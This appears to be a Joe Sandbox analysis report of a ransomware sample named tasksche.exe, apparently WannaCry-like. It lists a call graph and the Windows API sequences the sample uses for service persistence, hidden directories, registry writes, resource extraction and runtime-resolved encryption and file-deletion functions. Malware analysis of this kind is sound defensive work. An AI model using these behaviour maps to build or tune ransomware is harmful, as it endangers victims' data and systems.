2857->2858 2859 4037cf 2858->2859 2862 4037e1 2858->2862 2875 4031bc 2859->2875 2861 4037dc 2861->2843 2862->2861 2863 403923 memcpy 2862->2863 2863->2861 2863->2862 2865 403a35 ??0exception@@QAE@ABQBD _CxxThrowException 2864->2865 2866 403a51 memcpy 2864->2866 2865->2866 2866->2843 2866->2850 2868 403520 ??0exception@@QAE@ABQBD _CxxThrowException 2867->2868 2869 40353c 2867->2869 2868->2869 2870 403547 2869->2870 2872 403559 2869->2872 2878 402e7e 2870->2878 2873 403554 2872->2873 2874 403695 memcpy 2872->2874 2873->2840 2873->2873 2874->2872 2874->2873 2876 4031ea 2875->2876 2877 4031ce ??0exception@@QAE@ABQBD _CxxThrowException 2875->2877 2876->2861 2877->2876 2879 402e90 ??0exception@@QAE@ABQBD _CxxThrowException 2878->2879 2880 402eac 2878->2880 2879->2880 2880->2873 2905 402457 2881->2905 2883 402200 2884 40213f 2883->2884 2885 402214 SetLastError 2883->2885 2887 402457 SetLastError 2883->2887 2884->2270 2884->2376 2885->2884 2890 402235 2887->2890 2888 40228c GetModuleHandleA 2888->2884 2889 40229f 2888->2889 2889->2884 2889->2885 2891 40230f GetProcessHeap HeapAlloc 2889->2891 2890->2884 2890->2885 2890->2888 2891->2885 2892 40233d 2891->2892 2893 402457 SetLastError 2892->2893 2895 402382 2893->2895 2894 402436 2930 4029cc 2894->2930 2895->2894 2897 40239d memcpy 2895->2897 2908 402470 2897->2908 2899 4023c7 2899->2894 2914 4027df 2899->2914 2903 402400 2903->2884 2903->2894 2904 40242b SetLastError 2903->2904 2904->2894 2906 402461 SetLastError 2905->2906 2907 40246c 2905->2907 2906->2883 2907->2883 2909 40253f 2908->2909 2912 402499 2908->2912 2909->2899 2910 402457 SetLastError 2910->2912 2911 4024c8 memset 2911->2912 2912->2909 2912->2910 2912->2911 2913 402512 memcpy 2912->2913 2913->2912 2915 40280a IsBadReadPtr 2914->2915 2916 4023f5 2914->2916 2915->2916 2920 402820 2915->2920 2916->2894 2924 40254b 2916->2924 2917 402846 realloc 2919 4028ec SetLastError 2917->2919 2917->2920 2919->2916 2920->2916 2920->2917 2920->2919 2921 4028d6 IsBadReadPtr 2920->2921 2922 402909 SetLastError 2920->2922 2921->2916 2921->2920 2922->2916 2925 402579 2924->2925 2927 40263e 2925->2927 2929 40262e 2925->2929 2936 40267b 2925->2936 2926 40267b VirtualProtect 2926->2927 2927->2903 2929->2926 2931 4029d8 2930->2931 2932 402a43 2930->2932 2933 402a1d GetProcessHeap HeapFree 2931->2933 2935 402a12 free 2931->2935 2932->2884 2933->2932 2935->2933 2937 402692 2936->2937 2938 40268a 2936->2938 2937->2938 2939 402705 VirtualProtect 2937->2939 2938->2925 2939->2938 2941 4018b9 ctype CryptReleaseContext 2940->2941 2942 4013db 2941->2942 2943 4018b9 ctype CryptReleaseContext 2942->2943 2945 4013e3 2943->2945 2944 401410 2946 401430 2944->2946 2947 401421 GlobalFree 2944->2947 2945->2944 2948 401401 GlobalFree 2945->2948 2946->2385 2947->2946 2948->2944 2949->2387 2950->2389 2981 40790c _exit 2956 4041de 2957 4041e4 2956->2957 2958 403bd6 2 API calls 2957->2958 2959 4041fb 2958->2959 2960 403bd6 2 API calls 2959->2960 2961 40427f 2960->2961 2982 402a53 2983 402a5b ctype 2982->2983 2984 402a69 2983->2984 2985 402a62 ??3@YAXPAX 2983->2985 2985->2984 2962 402198 LoadLibraryA 2963 402185 VirtualFree 2987 40216e VirtualAlloc 2986 4021a3 GetProcAddress 2964 4056dd calloc 2965 4019b1 2966 4019b7 GlobalFree 2965->2966 2967 4019c0 2965->2967 2966->2967 2968 4019c6 CloseHandle 2967->2968 2969 4019cf 2967->2969 2968->2969 2988 40799c ??3@YAXPAX 2970 40774c ??1type_info@@UAE 2971 407762 2970->2971 2972 40775b ??3@YAXPAX 2970->2972 2972->2971

    Executed Functions

    Function 00401CE8, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 75
    APIs
    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?), ref: 00401CFE
    • OpenServiceA.ADVAPI32(00000000,ywepvofkuzu108,000F01FF,tasksche.exe,00000000), ref: 00401D21
    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
    • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
    • sprintf.MSVCRT ref: 00401D54
    • CreateServiceA.ADVAPI32(?,ywepvofkuzu108,ywepvofkuzu108,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00401D75
    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D84
    • CloseServiceHandle.ADVAPI32(00000000), ref: 00401D8B
    • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00401FE7, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 132
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040201F
      • Part of subcall function 00401225: GetComputerNameW.KERNEL32(?,0000018F), ref: 0040125F
      • Part of subcall function 00401225: wcslen.MSVCRT ref: 00401279
      • Part of subcall function 00401225: wcslen.MSVCRT ref: 00401298
      • Part of subcall function 00401225: srand.MSVCRT ref: 004012A1
      • Part of subcall function 00401225: rand.MSVCRT ref: 004012AE
      • Part of subcall function 00401225: rand.MSVCRT ref: 004012C0
      • Part of subcall function 00401225: rand.MSVCRT ref: 004012DD
    • __p___argc.MSVCRT ref: 00402030
    • __p___argv.MSVCRT ref: 00402040
    • strcmp.MSVCRT ref: 0040204B
      • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,ywepvofkuzu108,000000FF,?,00000063,?), ref: 00401BCA
      • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
      • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
      • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
      • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
      • Part of subcall function 00401B5F: GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
      • Part of subcall function 00401B5F: wcsrchr.MSVCRT ref: 00401CAC
      • Part of subcall function 00401B5F: wcsrchr.MSVCRT ref: 00401CBD
    • CopyFileA.KERNEL32(?,tasksche.exe,00000000), ref: 0040206F
    • GetFileAttributesA.KERNEL32(tasksche.exe,?,00000000), ref: 00402076
      • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000,?), ref: 00401F97
    • strrchr.MSVCRT ref: 0040209D
    • strrchr.MSVCRT ref: 004020AE
    • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
      • Part of subcall function 004010FD: wcscat.MSVCRT ref: 0040114B
      • Part of subcall function 004010FD: RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
      • Part of subcall function 004010FD: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
      • Part of subcall function 004010FD: strlen.MSVCRT ref: 004011A7
      • Part of subcall function 004010FD: RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
      • Part of subcall function 004010FD: RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
      • Part of subcall function 004010FD: SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
      • Part of subcall function 004010FD: RegCloseKey.ADVAPI32(00000000), ref: 00401203
      • Part of subcall function 00401DAB: FindResourceA.KERNEL32(00000000,0000080A,XIA), ref: 00401DC3
      • Part of subcall function 00401DAB: LoadResource.KERNEL32(00000000,00000000), ref: 00401DD3
      • Part of subcall function 00401DAB: LockResource.KERNEL32(00000000), ref: 00401DDE
      • Part of subcall function 00401DAB: SizeofResource.KERNEL32(00000000,00000000,004020D5), ref: 00401DF1
      • Part of subcall function 00401DAB: strcmp.MSVCRT ref: 00401E5B
      • Part of subcall function 00401DAB: GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00401E6E
      • Part of subcall function 00401E9E: rand.MSVCRT ref: 00401ED0
      • Part of subcall function 00401E9E: strcpy.MSVCRT(?,0040F488), ref: 00401EE7
      • Part of subcall function 00401064: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 004010A8
      • Part of subcall function 00401064: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004010BD
      • Part of subcall function 00401064: TerminateProcess.KERNEL32(00000000,000000FF), ref: 004010CC
      • Part of subcall function 00401064: GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004010DD
      • Part of subcall function 00401064: CloseHandle.KERNEL32(00000000), ref: 004010EC
      • Part of subcall function 00401064: CloseHandle.KERNEL32(00000000), ref: 004010F1
      • Part of subcall function 0040170A: LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,CreateFileW,768DDBAE), ref: 00401749
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
      • Part of subcall function 004012FD: __EH_prolog.LIBCMT ref: 00401302
      • Part of subcall function 00401437: GlobalAlloc.KERNEL32(00000000,00100000,00402117,?,768DDBAE,00000000,00402117,00000000,00000000,00000000), ref: 0040146A
      • Part of subcall function 00401437: GlobalAlloc.KERNEL32(00000000,00100000), ref: 00401479
      • Part of subcall function 0040137A: __EH_prolog.LIBCMT ref: 0040137F
      • Part of subcall function 004014A6: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
      • Part of subcall function 004014A6: GetFileSizeEx.KERNEL32(00000000,004081E0), ref: 00401529
      • Part of subcall function 004014A6: memcmp.MSVCRT ref: 00401572
      • Part of subcall function 004014A6: GlobalAlloc.KERNEL32(00000000,?,?,0000000A,00000010,?,768DDBAE,?,0000000A), ref: 0040166D
      • Part of subcall function 004014A6: _local_unwind2.MSVCRT ref: 004016D6
      • Part of subcall function 00402924: _stricmp.MSVCRT(00000000,?,?,768DDBAE,00000000,0000000A,?,00402150,00000000,TaskStart,t.wnry,0000000A,00000000,00000000,00000000), ref: 00402989
      • Part of subcall function 00402924: SetLastError.KERNEL32(0000007F,?,768DDBAE,00000000,0000000A,?,00402150,00000000,TaskStart,t.wnry,0000000A,00000000,00000000,00000000), ref: 004029A7
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00401B5F, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 123
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,ywepvofkuzu108,000000FF,?,00000063,?), ref: 00401BCA
    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
    • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
    • GetFileAttributesW.KERNEL32(?), ref: 00401C10
    • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
      • Part of subcall function 00401AF6: CreateDirectoryW.KERNELBASE(?,00000000,768FE87C,00000104,00000000,?,00401C6B,?,?,?), ref: 00401B07
      • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNELBASE(?,?,00401C6B,?,?,?), ref: 00401B12
      • Part of subcall function 00401AF6: CreateDirectoryW.KERNELBASE(?,00000000,?,00401C6B,?,?,?), ref: 00401B1E
      • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNELBASE(?,?,00401C6B,?,?,?), ref: 00401B21
      • Part of subcall function 00401AF6: GetFileAttributesW.KERNEL32(?,?,00401C6B,?,?,?), ref: 00401B2C
      • Part of subcall function 00401AF6: SetFileAttributesW.KERNELBASE(?,00000000,?,00401C6B,?,?,?), ref: 00401B36
      • Part of subcall function 00401AF6: swprintf.MSVCRT(00000000,%s\%s,?,?), ref: 00401B4E
    • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
    • wcsrchr.MSVCRT ref: 00401CAC
    • wcsrchr.MSVCRT ref: 00401CBD
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 004077BA, Relevance: 16.6, APIs: 11, Instructions: 111
    APIs
    • __set_app_type.MSVCRT ref: 004077E7
    • __p__fmode.MSVCRT ref: 004077FC
    • __p__commode.MSVCRT ref: 0040780A
    • __setusermatherr.MSVCRT ref: 00407836
      • Part of subcall function 0040792A: _controlfp.MSVCRT ref: 00407934
    • _initterm.MSVCRT ref: 0040784C
    • __getmainargs.MSVCRT ref: 0040786F
    • _initterm.MSVCRT ref: 0040787F
    • GetStartupInfoA.KERNEL32(?), ref: 004078BE
    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
      • Part of subcall function 00401FE7: GetModuleFileNameA.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040201F
      • Part of subcall function 00401FE7: __p___argc.MSVCRT ref: 00402030
      • Part of subcall function 00401FE7: __p___argv.MSVCRT ref: 00402040
      • Part of subcall function 00401FE7: strcmp.MSVCRT ref: 0040204B
      • Part of subcall function 00401FE7: CopyFileA.KERNEL32(?,tasksche.exe,00000000), ref: 0040206F
      • Part of subcall function 00401FE7: GetFileAttributesA.KERNEL32(tasksche.exe,?,00000000), ref: 00402076
      • Part of subcall function 00401FE7: strrchr.MSVCRT ref: 0040209D
      • Part of subcall function 00401FE7: strrchr.MSVCRT ref: 004020AE
      • Part of subcall function 00401FE7: SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
    • exit.MSVCRT ref: 004078F2
    • _XcptFilter.MSVCRT ref: 00407904
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00401AF6, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45
    APIs
    • CreateDirectoryW.KERNELBASE(?,00000000,768FE87C,00000104,00000000,?,00401C6B,?,?,?), ref: 00401B07
    • SetCurrentDirectoryW.KERNELBASE(?,?,00401C6B,?,?,?), ref: 00401B12
    • CreateDirectoryW.KERNELBASE(?,00000000,?,00401C6B,?,?,?), ref: 00401B1E
    • SetCurrentDirectoryW.KERNELBASE(?,?,00401C6B,?,?,?), ref: 00401B21
    • GetFileAttributesW.KERNEL32(?,?,00401C6B,?,?,?), ref: 00401B2C
    • SetFileAttributesW.KERNELBASE(?,00000000,?,00401C6B,?,?,?), ref: 00401B36
    • swprintf.MSVCRT(00000000,%s\%s,?,?), ref: 00401B4E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00401225, Relevance: 10.6, APIs: 7, Instructions: 87
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00401F5D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
    APIs
    • GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000,?), ref: 00401F97
      • Part of subcall function 00401CE8: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?), ref: 00401CFE
      • Part of subcall function 00401CE8: OpenServiceA.ADVAPI32(00000000,ywepvofkuzu108,000F01FF,tasksche.exe,00000000), ref: 00401D21
      • Part of subcall function 00401CE8: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
      • Part of subcall function 00401CE8: CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
      • Part of subcall function 00401CE8: sprintf.MSVCRT ref: 00401D54
      • Part of subcall function 00401CE8: CreateServiceA.ADVAPI32(?,ywepvofkuzu108,ywepvofkuzu108,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00401D75
      • Part of subcall function 00401CE8: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D84
      • Part of subcall function 00401CE8: CloseServiceHandle.ADVAPI32(00000000), ref: 00401D8B
      • Part of subcall function 00401CE8: CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
      • Part of subcall function 00401064: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 004010A8
      • Part of subcall function 00401064: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004010BD
      • Part of subcall function 00401064: TerminateProcess.KERNEL32(00000000,000000FF), ref: 004010CC
      • Part of subcall function 00401064: GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004010DD
      • Part of subcall function 00401064: CloseHandle.KERNEL32(00000000), ref: 004010EC
      • Part of subcall function 00401064: CloseHandle.KERNEL32(00000000), ref: 004010F1
      • Part of subcall function 00401EFF: sprintf.MSVCRT ref: 00401F16
      • Part of subcall function 00401EFF: OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
      • Part of subcall function 00401EFF: Sleep.KERNEL32(000003E8), ref: 00401F40
      • Part of subcall function 00401EFF: CloseHandle.KERNEL32(00000000), ref: 00401F52
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd

    Non-executed Functions

    Function 004029CC, Relevance: 3.8, APIs: 3, Instructions: 55
    APIs
    • free.MSVCRT(?,?,00000000,00000000,0040243C,00000000), ref: 00402A15
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
    • HeapFree.KERNEL32(00000000), ref: 00402A3D
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00406C40, Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 365
    APIs
    • memcpy.MSVCRT ref: 00406C91
      • Part of subcall function 00405D0E: SetFilePointer.KERNEL32(000000FF,00000002,00000000,00000002,?,00405EF3,00000000), ref: 00405D4A
    • ??2@YAPAXI@Z.MSVCRT ref: 00406D61
      • Part of subcall function 00405D8A: ReadFile.KERNEL32(3C7501F8,00000001,00000000,00000001,00000000), ref: 00405DAB
      • Part of subcall function 00405D8A: memcpy.MSVCRT ref: 00405DD9
    • ??3@YAXPAX@Z.MSVCRT ref: 00406D83
    • strcpy.MSVCRT(?,?), ref: 00406DAB
    • _mbsstr.MSVCRT ref: 00406DDF
    • _mbsstr.MSVCRT ref: 00406DED
    • _mbsstr.MSVCRT ref: 00406DFB
    • _mbsstr.MSVCRT ref: 00406E09
    • strcpy.MSVCRT(00000103,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00406E1B
      • Part of subcall function 00406B23: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00406EE5,?,?), ref: 00406B80
    • LocalFileTimeToFileTime.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00406EF5
    • strcmp.MSVCRT ref: 00406F54
    • ??3@YAXPAX@Z.MSVCRT ref: 0040703C
    • memcpy.MSVCRT ref: 0040704F
      • Part of subcall function 00406A97: free.MSVCRT(000000FF,?,?,?,00000000,?,00406C75,000000FF,?,00000000,00000000), ref: 00406AD8
      • Part of subcall function 00406A97: free.MSVCRT(?,?,?,?,00000000,?,00406C75,000000FF,?,00000000,00000000), ref: 00406AF2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 0040170A, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 65
    APIs
      • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00401A5A
      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,768DDBAE), ref: 00401A77
      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00401A84
      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00401A91
      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00401A9E
      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00401AAB
      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00401AB8
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
    • GetProcAddress.KERNEL32(00000000,CreateFileW,768DDBAE), ref: 00401749
    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
    • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
    • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
    • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
    • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00401A45, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 56
    APIs
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00401A5A
    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,768DDBAE), ref: 00401A77
    • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00401A84
    • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00401A91
    • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00401A9E
    • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00401AAB
    • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00401AB8
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    Function 00407136, Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272
    APIs
      • Part of subcall function 0040671D: malloc.MSVCRT ref: 00406766
      • Part of subcall function 0040671D: malloc.MSVCRT ref: 00406778
      • Part of subcall function 0040671D: free.MSVCRT(00000000), ref: 00406795
      • Part of subcall function 00406A97: free.MSVCRT(000000FF,?,?,?,00000000,?,00406C75,000000FF,?,00000000,00000000), ref: 00406AD8
      • Part of subcall function 00406A97: free.MSVCRT(?,?,?,?,00000000,?,00406C75,000000FF,?,00000000,00000000), ref: 00406AF2
      • Part of subcall function 00406C40: memcpy.MSVCRT ref: 00406C91
      • Part of subcall function 00406C40: ??2@YAPAXI@Z.MSVCRT ref: 00406D61
      • Part of subcall function 00406C40: ??3@YAXPAX@Z.MSVCRT ref: 00406D83
      • Part of subcall function 00406C40: strcpy.MSVCRT(?,?), ref: 00406DAB
      • Part of subcall function 00406C40: _mbsstr.MSVCRT ref: 00406DDF
      • Part of subcall function 00406C40: _mbsstr.MSVCRT ref: 00406DED
      • Part of subcall function 00406C40: _mbsstr.MSVCRT ref: 00406DFB
      • Part of subcall function 00406C40: _mbsstr.MSVCRT ref: 00406E09
      • Part of subcall function 00406C40: strcpy.MSVCRT(00000103,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00406E1B
      • Part of subcall function 00406C40: LocalFileTimeToFileTime.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00406EF5
      • Part of subcall function 00406C40: strcmp.MSVCRT ref: 00406F54
      • Part of subcall function 00406C40: ??3@YAXPAX@Z.MSVCRT ref: 0040703C
      • Part of subcall function 00406C40: memcpy.MSVCRT ref: 0040704F
    • strcpy.MSVCRT(?,00000000,?,?,00000000,00000000,00000000), ref: 004072CF
    • wsprintfA.USER32 ref: 004072FC
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 0040732B
    • wsprintfA.USER32 ref: 0040738F
      • Part of subcall function 00407070: GetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407083
      • Part of subcall function 00407070: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00407091
      • Part of subcall function 00407070: memcpy.MSVCRT ref: 004070CA
      • Part of subcall function 00407070: strcpy.MSVCRT(00000000,00000000,00000000,00000000), ref: 004070FB
      • Part of subcall function 00407070: strcat.MSVCRT(00000000,004073A3,00000000,00000000), ref: 0040710A
      • Part of subcall function 00407070: GetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407118
